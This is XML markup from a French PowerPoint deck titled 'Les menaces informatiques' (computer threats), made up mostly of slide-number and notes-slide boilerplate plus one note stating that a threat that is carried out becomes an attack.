        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3861990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21</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313996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4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2863535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22</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="517588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23</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1902826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24</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2501171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25</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4140600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26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2922672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27</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3656419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28</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103087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29</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1400645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30</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1791253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31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1315236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5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591851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32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4235118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33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="492869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34</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2214835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35</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422066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36</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225487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37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3578364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38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373573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39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1301287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40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928689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41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3980612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6</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4173262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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377593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43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339364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44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808170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45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863977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46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2781550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47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1583900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48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442110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49</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="737994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50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40140131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51</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55166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menace si elle se concrétise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> devient une attaque</a:t>
            </a:r>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35848595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52</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3293895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53</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14299936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54</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2363331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55</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9323499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56</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24364292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57</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070970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58</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13973385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59</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6408489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60</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12443777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61</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1160974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8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4139417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62</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2092303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63</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3601490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64</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3702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65</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13321764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66</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2540937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67</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41253944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68</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32746685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69</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195707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70</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34866536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71</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3807727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9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11119775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72</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19714126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73</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8372700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74</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564944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1C2FC47-4E15-4E8B-A891-A0AF041DE8C4}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1214849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CFDB8FCA-BD94-4E8A-8BAF-8220C0D5A0FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3781922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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2345579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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715922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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314205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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603478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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417930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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2688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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2268559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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3894441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004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1481454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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2490424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D004D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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20CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58651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4D3DE-923F-4298-8A63-E2A244FE0B56}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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0CDA0A-6CA1-49C7-ACFE-3370428B0902}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533411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jp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7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624167"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Adobe Heiti Std R" panose="020B0400000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Les menaces informatiques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Adobe Heiti Std R" panose="020B0400000000000000" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
